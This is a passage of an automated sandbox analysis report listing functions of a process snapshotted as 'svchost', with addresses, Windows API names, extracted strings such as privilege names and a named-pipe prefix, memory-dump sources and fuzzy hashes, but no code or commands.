                                      • Instruction ID: 2c7c2971c60a907b1fc456a9b88cbe8b87c6002faf689f355f185b4608e8d7a7
                                      • Opcode Fuzzy Hash: 53a927f6c22a7943a225c497b2bc8e3dd13ffe24a07be28bf3058a85aef6c9a4
                                      • Instruction Fuzzy Hash: 6AF0AF62909285C6EA509F75950817C37F09B2ABB4F140375DE7D4B2DBCE28D499C714
                                      Function 00007FF669AD2270 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF669AD2284
                                        • Part of subcall function 00007FF669AD4030: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF669AD4038
                                        • Part of subcall function 00007FF669AD4030: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF669AD403D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                      • String ID:
                                      • API String ID: 1208906642-0
                                      • Opcode ID: d4aef5e5459b75806afb1256d492625439a4beee7a9efb9b6a672efda55c4a8e
                                      • Instruction ID: 374ca93adbc40f53cd380ed2207bcec565db53c5c80f7d38bf1f69abdfd8d21f
                                      • Opcode Fuzzy Hash: d4aef5e5459b75806afb1256d492625439a4beee7a9efb9b6a672efda55c4a8e
                                      • Instruction Fuzzy Hash: 53E09954D0D243C4FEA82E6115162B926F02F66384F500178EC8ADA7C39E0E624F92A2
                                      Function 00007FF669AB1864 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 6cfa110d5cef1c62e08b81ac8735d8479bd886b62a52d4c4be8f8cb2197252d2
                                      • Instruction ID: ef497fd641ad695f8e141e55002c29f1c6f608ce9d66dee9301757111cb991dc
                                      • Opcode Fuzzy Hash: 6cfa110d5cef1c62e08b81ac8735d8479bd886b62a52d4c4be8f8cb2197252d2
                                      • Instruction Fuzzy Hash: 62D0C912909485C2E9146AA9985103C22B0BF42735FA40720D63ACA6E1CE1D9596A210
                                      Function 00007FF669AB7268 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: cd7659c9ddd24a77d48b55e72de66fd3dd5a193154eaa8ea857c6d2ede7f55eb
                                      • Instruction ID: 219a5f7ecc48d096ad27859a5891dbbd0232f03fc38a21f789414fb97b7dd8de
                                      • Opcode Fuzzy Hash: cd7659c9ddd24a77d48b55e72de66fd3dd5a193154eaa8ea857c6d2ede7f55eb
                                      • Instruction Fuzzy Hash: 4FC08C20F02502C2DA086F2ACA8102C23F0BB44B44F608035C90DC5120CE2DCC9A9300
                                      Function 00007FF669ADE944 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap
                                      • String ID:
                                      • API String ID: 4292702814-0
                                      • Opcode ID: 292f7c19bff47af04a46d1b5dfd17efd2d6056f18471c16cf3b34eddd24b4daf
                                      • Instruction ID: 35fc62d8e8e8b5eaa4f019c8b3d6936dcd4a7dc0d29de46db639cd67504c7736
                                      • Opcode Fuzzy Hash: 292f7c19bff47af04a46d1b5dfd17efd2d6056f18471c16cf3b34eddd24b4daf
                                      • Instruction Fuzzy Hash: BDF04F55B0A206C6FEA55F6195503B9F2F15F89B80F5C4430CD0DCE3C2EE1CE5894111
                                      Function 00007FF669AB14D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 88b333418fbb9a41aad7cb5c738162b265e1cd5aa5de0f0b1c7f33e5cf95fe78
                                      • Instruction ID: a244ecd7803d9d356960f9e84b06c31e5beab1042e6658d50f0707975518ad19
                                      • Opcode Fuzzy Hash: 88b333418fbb9a41aad7cb5c738162b265e1cd5aa5de0f0b1c7f33e5cf95fe78
                                      • Instruction Fuzzy Hash: D6F0A962A0868AD6FB248F70E44437936B1EB04B79F484334DE3E891D8CF2CD895C340
                                      Function 00007FF669ADC818 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap
                                      • String ID:
                                      • API String ID: 4292702814-0
                                      • Opcode ID: 0042b4a878b9b8c4ecf8a32c33e373efbfc6dc6c8c16e1fabcf80cd824422c21
                                      • Instruction ID: d3c556eb678fbc172b92c4d173bc1d91ef2101571f340481b74fee58aab6a44c
                                      • Opcode Fuzzy Hash: 0042b4a878b9b8c4ecf8a32c33e373efbfc6dc6c8c16e1fabcf80cd824422c21
                                      • Instruction Fuzzy Hash: D2F0F861F4D246C5FE645FA25951AB932F15F89BA0F884630DD2ECE3C1DE6CE5898210

                                      Non-executed Functions

                                      Function 00007FF669AAB8F0 Relevance: 53.3, APIs: 26, Strings: 4, Instructions: 781fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$wcscpy$CloseDirectoryFileHandleRemove$CreateErrorLast$Concurrency::cancel_current_taskControlCurrentDeleteDeviceProcess
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 938441313-3508440684
                                      • Opcode ID: f67eb2998188988e2b0a1f2570f8951e1953cc602bb9093486d56a6496ad84bc
                                      • Instruction ID: b6bb1e3fff8a363043f9ce28592a58c8162372fbf5e8184b742ba520df04743e
                                      • Opcode Fuzzy Hash: f67eb2998188988e2b0a1f2570f8951e1953cc602bb9093486d56a6496ad84bc
                                      • Instruction Fuzzy Hash: 84729E62F18686C6FB00DF78D4452BD33B1AB857A4F505331EE6D9AADADE38E585C300
                                      Function 00007FF669AB0E54 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                      • String ID: rtmp
                                      • API String ID: 3587137053-870060881
                                      • Opcode ID: 7db052c56a44bd0e381748e2d1090abdb697578b857e720ea9b89de431250ef8
                                      • Instruction ID: d1d87a8e56ccaa66072ee162582631f4b1eea0e42f23325b56ff4216c86bf388
                                      • Opcode Fuzzy Hash: 7db052c56a44bd0e381748e2d1090abdb697578b857e720ea9b89de431250ef8
                                      • Instruction Fuzzy Hash: FDF1AD22A08A86D6EB10DF65D4801FD77F1EB95794F501232EE4D9BAAADF3CE585C300
                                      Function 00007FF669AB4EE4 Relevance: 12.2, APIs: 8, Instructions: 239COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1693479884-0
                                      • Opcode ID: af6d3e4abd2a055a70f5e168263153ac329b7855e86384a56c25524d53e28e79
                                      • Instruction ID: e388a781027de65c7c892dae9438e8231d123631022531fa6791de0165680e19
                                      • Opcode Fuzzy Hash: af6d3e4abd2a055a70f5e168263153ac329b7855e86384a56c25524d53e28e79
                                      • Instruction Fuzzy Hash: 3491AD62F15B56C5FE009FB9D8445BD33F1AB89BA4B106235DE2D9BBC9DE3CE4818200
                                      Function 00007FF669AC807C Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 429COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-3916222277
                                      • Opcode ID: d00721000243fdef9c53e679a920a4edda61c50f747ad193ebda8997fb03b4d4
                                      • Instruction ID: 09af23ac0fddfebd8885c51fdf75737c5af680c68aa2632a1dfa1b1020715aa3
                                      • Opcode Fuzzy Hash: d00721000243fdef9c53e679a920a4edda61c50f747ad193ebda8997fb03b4d4
                                      • Instruction Fuzzy Hash: 5302C962F09B86C1EA10DF68D0401BD73B2BB94B98F505232DE6D9E7D9EF78E5858340
                                      Function 00007FF669AD2BB0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 5d0c2cdb600253a112039d53f6e53d0d17808d24ed258e738d60e0abbf418c3f
                                      • Instruction ID: 017c7ccdf63882957978eb47b492c444869a05b7901c48e605112d748715757f
                                      • Opcode Fuzzy Hash: 5d0c2cdb600253a112039d53f6e53d0d17808d24ed258e738d60e0abbf418c3f
                                      • Instruction Fuzzy Hash: 1E311A76608B82CAEB609F64E8503E973B4FB84744F44443ADE4E8BB98DF78D649C710
                                      Function 00007FF669AD6628 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: bfd67cc7913bb9c5daa93001e37a0d443e56d2534886e383b5bccabf986ee659
                                      • Instruction ID: d742d6ecc9ef8a76e8b7e13f5bfc6e70f2fb2661543842133d92a3d45a219620
                                      • Opcode Fuzzy Hash: bfd67cc7913bb9c5daa93001e37a0d443e56d2534886e383b5bccabf986ee659
                                      • Instruction Fuzzy Hash: 17313D36618B81C6DB648F25E8402AE73B4FB88758F540135EE9D87B99DF38D559CB00
                                      Function 00007FF669AA1AB4 Relevance: 6.3, APIs: 4, Instructions: 280COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 01c9e1afa5f40b65f74732f47e984549462867107ffd409a88eb306ceec3fb4c
                                      • Instruction ID: 8549cb0272a82220b47ffb9f32b61a0e2538d13673d4a7caa809e1008d5b9a2c
                                      • Opcode Fuzzy Hash: 01c9e1afa5f40b65f74732f47e984549462867107ffd409a88eb306ceec3fb4c
                                      • Instruction Fuzzy Hash: D8B18F62A14A96A7EB109F65D8412BD33B1FB89798F405236EE5C8BB95DF2CE544C300
                                      Function 00007FF669AAC824 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c512cb65a9e4a9dfc141e7338469cd4b21cffa475f08b4dc819125c57d1eb1a1
                                      • Instruction ID: 010bcba42eb5fb29161851ff06aff0dea6b9f9f6d13f93c3850bc4177cae9032
                                      • Opcode Fuzzy Hash: c512cb65a9e4a9dfc141e7338469cd4b21cffa475f08b4dc819125c57d1eb1a1
                                      • Instruction Fuzzy Hash: 8CB1A063A18682C6FB20DF28D4412BD73B1EB85794F505231EE4D9BAAADF3CE585C700
                                      Function 00007FF669ADE9D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                      Download Yara Rule
                                      APIs
                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF669ADEA04
                                        • Part of subcall function 00007FF669AD6884: GetCurrentProcess.KERNEL32(00007FF669ADFC0D), ref: 00007FF669AD68B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                      • String ID: *?$.
                                      • API String ID: 2518042432-3972193922
                                      • Opcode ID: 6c48adfc9562f552bab25e0627fbeed4785c1a74431500d895d15752767426cb
                                      • Instruction ID: 1233c660b31c2067f31ce5b714146e023a55c03e51d4dd8c7a69528df3502039
                                      • Opcode Fuzzy Hash: 6c48adfc9562f552bab25e0627fbeed4785c1a74431500d895d15752767426cb
                                      • Instruction Fuzzy Hash: 9051C062B14A96C5FF10DF6198000BCB7F5BB48BD8B548531DE1E9BB85DE3CE4468300
                                      Function 00007FF669AA2C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Create$EventNamedPipe
                                      • String ID: \\.\pipe\
                                      • API String ID: 412621846-91387939
                                      • Opcode ID: f3eebe51544f6fc9de6de0bc7f5d8c2c79a1f417ad19e936a21bebe7d5b8b42f
                                      • Instruction ID: 30109c732a668e8eff4a02ef57772116c68e0d20d821d49e49e356b4a0b094ba
                                      • Opcode Fuzzy Hash: f3eebe51544f6fc9de6de0bc7f5d8c2c79a1f417ad19e936a21bebe7d5b8b42f
                                      • Instruction Fuzzy Hash: 3E218872614781C6D710CF24E05036A77B0E7847A8F204325DEAD4A6E5DF3DD585CB40
                                      Function 00007FF669AAAE3C Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFormatFreeLastLocalMessage
                                      • String ID:
                                      • API String ID: 1365068426-0
                                      • Opcode ID: a587a837c65065e08ac0ceaeee7012d7e9f34c86446267b0222f8841e56504d6
                                      • Instruction ID: 1aae8c7c27e0dc7a4928149b85fd0f94138cd4069bdf6d265c92c22a8e54c307
                                      • Opcode Fuzzy Hash: a587a837c65065e08ac0ceaeee7012d7e9f34c86446267b0222f8841e56504d6
                                      • Instruction Fuzzy Hash: 66F04972A18746C3EB208F22A41033A73F3AB85B96F040034DE4A8AA84CF3CD4059B00
                                      Function 00007FF669ADEBE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 93415719eb3e3f946296a88886e8804c53bcd324b38b44e42a0acaa7de3a1920
                                      • Instruction ID: 9f1fb78096ea01d55f5d5a72e5b3a344fa5a4c08f47b3a4b7935c12bef0463c2
                                      • Opcode Fuzzy Hash: 93415719eb3e3f946296a88886e8804c53bcd324b38b44e42a0acaa7de3a1920
